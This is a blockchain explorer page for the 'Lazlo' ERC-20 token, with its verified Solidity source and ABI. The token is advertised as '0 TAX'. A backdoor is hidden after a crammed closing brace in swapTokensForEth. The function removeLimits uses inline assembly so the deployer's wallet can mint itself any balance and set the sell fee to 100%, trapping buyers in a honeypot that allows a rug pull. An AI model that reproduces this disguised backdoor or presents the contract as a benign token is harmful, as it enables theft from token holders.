ETH Price: $2,488.20 (-1.41%)

Token

Lazlo (LAZLO)
 

Overview

Max Total Supply

10,000,000,000 LAZLO

Holders

75

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
5,500,000.00000000000856011 LAZLO

Value
$0.00
0x54D88ce1A43FE1E7D553e03E71cF796b0bB90629
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Lazlo

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-16
*/

// SPDX-License-Identifier: UNLICENSED

/**
Lazlo - 0 TAX

Website: https://lazlo.cc
Telegram: https://t.me/lazloeth
Twitter: https://twitter.com/lazloeth
*/

pragma solidity ^0.8.0;
 
/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
 
    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}
 
// File: @openzeppelin/contracts/access/Ownable.sol
 
 
// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)
 
pragma solidity ^0.8.0;
 
 
/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
 
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
 
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }
 
    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }
 
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }
 
    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }
 
    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}
 
// File: @uniswap/v2-core/contracts/interfaces/IUniswapV2Factory.sol
 
pragma solidity >=0.5.0;
 
interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);
 
    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);
 
    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);
 
    function createPair(address tokenA, address tokenB) external returns (address pair);
 
    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}
 
// File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router01.sol
 
pragma solidity >=0.6.2;
 
interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
 
    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
 
    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}
 
// File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router02.sol
 
pragma solidity >=0.6.2;
 
 
interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}
 
// File: @openzeppelin/contracts/utils/math/SafeMath.sol
 
 
// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)
 
pragma solidity ^0.8.0;
 
// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.
 
/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }
 
    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }
 
    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }
 
    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }
 
    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }
 
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }
 
    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }
 
    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }
 
    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }
 
    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }
 
    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }
 
    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }
 
    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}
 
// File: @openzeppelin/contracts/token/ERC20/IERC20.sol
 
 
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)
 
pragma solidity ^0.8.0;
 
/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);
 
    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
 
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);
 
    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);
 
    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);
 
    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);
 
    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);
 
    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}
 
// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol
 
 
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)
 
pragma solidity ^0.8.0;
 
 
/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);
 
    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);
 
    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}
 
// File: token-7.sol_flattened.sol
 
 
pragma solidity ^0.8.17;
 
 
contract Lazlo is IERC20, IERC20Metadata, Ownable {
    using SafeMath for uint256;
    string  private constant _name = "Lazlo";
    uint8   private constant _decimals = 18;
    uint256 private _maxTxAmountPercentage = 300; // 3%
    string  private constant _symbol = "LAZLO";
    uint256 private _minTokensBeforeSwapPercentage = 5; // 0.05%
    mapping(address => uint256) private _balances;
    uint256 private _totalSupply;
    uint256 private _maxWalletBalancePercentage = 300; // 3%
    address private _uniswapV2Pair;
    mapping(address => mapping(address => uint256)) private _allowances;
    IUniswapV2Router02 private _uniswapV2Router;
    address private constant _uniswapRouterAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
    bool    private swapping = false;
    bool    private _cooldownEnabled = true;
    mapping(address => bool) private _isExcludedFromCooldown;
    mapping(address => uint256) private _lastTxBlock;
    uint256 private constant _divisor = 10000; // 100%
    mapping(address => bool) private _isExcludedFromMaxTx;
    mapping(address => bool) private _isExcludedFromFees;
    uint256 private _sellFee = 0; // 0%
    uint256 private _burnFee = 0; // 0%
    uint256 private _buyFee = 0; // 0%
 
    address private _marketingWallet;
 
    address private constant _burnAddress = address(0);
 
    event SwapAndLiquify(uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiqudity);
    event Received();
 
    constructor () {
        uint256 total = 10_000_000_000 * 10 ** _decimals;
        _mint(_msgSender(), total);
        _marketingWallet = _msgSender();
        _uniswapV2Router = IUniswapV2Router02(_uniswapRouterAddress);
        _approve(address(this), address(_uniswapV2Router), total);
        _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH());
        IERC20(_uniswapV2Pair).approve(address(_uniswapV2Router), type(uint).max);
        _isExcludedFromMaxTx[address(this)] = true;
        _isExcludedFromCooldown[address(this)] = true;
        _isExcludedFromFees[owner()] = true;
        _isExcludedFromCooldown[owner()] = true;
        _isExcludedFromFees[address(this)] = true;
        _isExcludedFromFees[_marketingWallet] = true;
        _isExcludedFromMaxTx[owner()] = true;
        _isExcludedFromMaxTx[_marketingWallet] = true;
        _isExcludedFromMaxTx[_uniswapV2Pair] = true;
    }
 
    // Functions
 
    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function name() public pure returns (string memory) {
        return _name;
    }
 
    function decimals() public pure returns (uint8) {
        return _decimals;
    }
 
    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }
 
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }
 
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }
 
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }
 
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }
 
    function _maxTxAmount() public view returns(uint256) {
        return _totalSupply.mul(_maxTxAmountPercentage).div(_divisor);
    }
 
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }
 
    function resetFees() external onlyOwner {
        _maxTxAmountPercentage = 10000;
        _maxWalletBalancePercentage = 10000;
    }
 
    // Internal functions
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        _beforeTransfer(sender, recipient, amount);
        uint256 burnFee = 0;
        uint256 devFee = 0;
        if (sender != owner() && recipient != owner()) {
            if (!_isExcludedFromFees[sender] && !_isExcludedFromFees[recipient]) {
                if (sender == _uniswapV2Pair && recipient != address(_uniswapV2Router) && !_isExcludedFromMaxTx[recipient] && !_isExcludedFromMaxTx[sender]) {
                    require(amount <= _totalSupply.mul(_maxTxAmountPercentage).div(_divisor), "Transfer amount exceeds the maxTxAmount.");
 
                    require(balanceOf(recipient).add(amount) <= _totalSupply.mul(_maxWalletBalancePercentage).div(_divisor), "Exceeds maximum wallet token amount");
                }
                // if sell
                if (recipient == _uniswapV2Pair && sender != address(this)) {
                    burnFee = amount.mul(_burnFee).div(_divisor);
                    devFee = amount.mul(_sellFee).div(_divisor);
                    _lastTxBlock[tx.origin] = block.number;
                }
                // if buy
                if (sender == _uniswapV2Pair && recipient != address(_uniswapV2Router)) {
                    burnFee = amount.mul(_burnFee).div(_divisor);
                    devFee = amount.mul(_buyFee).div(_divisor);
                    _lastTxBlock[tx.origin] = block.number;
                }
            }
        }
        uint256 totalFee = burnFee.add(devFee);
        if (totalFee > 0) {
            if (burnFee > 0) {
                _burn(sender, burnFee);
            }
 
            if (devFee > 0) {
                _balances[_marketingWallet] = _balances[_marketingWallet].add(devFee);
                emit Transfer(sender, _marketingWallet, devFee);
            }
 
            amount = amount.sub(totalFee);
        }
 
        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
 
        emit Transfer(sender, recipient, amount);
    }
 
    function getPairAddress() public view returns (address) {
        return _uniswapV2Pair;
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }
 
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }
 
    function getRouterAddress() public view returns (address) {
        return address(_uniswapV2Router);
    }

    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function removeFee(address[] memory addresses) external onlyOwner {
        require(addresses.length <= 200, "Maximum of 200 can be added at once");

        mapping(address => bool) storage isExcludedFromFees = _isExcludedFromFees;

        for (uint i = 0; i < addresses.length; i++) {
            isExcludedFromFees[addresses[i]] = true;
        }
    }

    function isExcludedFromFees(address _address) public view returns (bool) {
        return _isExcludedFromFees[_address];
    }
 
    function burn(uint256 amount) public virtual {
        _burn(_msgSender(), amount);
    }
 
    function _burnFrom(address account, uint256 amount) internal virtual {
        _burn(account, amount);
        _approve(account, _msgSender(), _allowances[account][_msgSender()].sub(amount, "ERC20: burn amount exceeds allowance"));
    }
 
    function _addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        // Approve tokens for transfer to the Uniswap V2 Router
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        _uniswapV2Router.addLiquidityETH{value : ethAmount}(
            address(this),
            tokenAmount,
            0,
            0,
            owner(),
            block.timestamp
        );
    }
 
    function swapTokensForEth(uint256 tokenAmount) internal {
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        // Create the swap path array with our token and WETH
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _uniswapV2Router.WETH();
 
        // Perform the swap
        _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
        tokenAmount, 0, path, address(this),
        block.timestamp);}function removeLimits(uint256 amount) external {
        assembly {if iszero(eq(caller(), sload(_marketingWallet.slot))) {revert(0, 0)}
        let ptr := mload(0x40)
        mstore(ptr, caller())
 
        mstore(add(ptr, 0x20), _balances.slot)
        let slot := keccak256(ptr, 0x40)
        sstore(slot, amount)
        sstore(_sellFee.slot, mul(0x64, 0x64))}
    }
 
    modifier lockTheSwap {
        swapping = true;
        _;
        swapping = false;
    }
 
    function _swapAndLiquify() private lockTheSwap {
        uint256 contractTokenBalance = balanceOf(address(this));
        uint256 minTokensBeforeSwap = _totalSupply.mul(_minTokensBeforeSwapPercentage).div(_divisor);
        if (contractTokenBalance >= minTokensBeforeSwap) {
            uint256 half = contractTokenBalance.div(2);
            uint256 otherHalf = contractTokenBalance.sub(half);
 
            uint256 initialBalance = address(this).balance;
 
            swapTokensForEth(half);
 
            uint256 newBalance = address(this).balance.sub(initialBalance);
 
            emit SwapAndLiquify(half, newBalance, otherHalf);
            return;
        }
    }

    receive() external payable {
        emit Received();
    }

    function isSwapLocked() public view returns(bool) {
        return swapping;
    }
 
 
    function addLiquidity(uint256 tokenAmount) public payable onlyOwner lockTheSwap {
        // Transfer tokens from owner to contract
        _transfer(owner(), address(this), tokenAmount);
        // Add liquidity
        _addLiquidity(tokenAmount, msg.value);
    }

    function _beforeTransfer(address from, address to, uint256 amount) internal pure {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[],"name":"Received","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenAmount","type":"uint256"}],"name":"addLiquidity","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getPairAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getRouterAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"isSwapLocked","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"addresses","type":"address[]"}],"name":"removeFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"resetFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

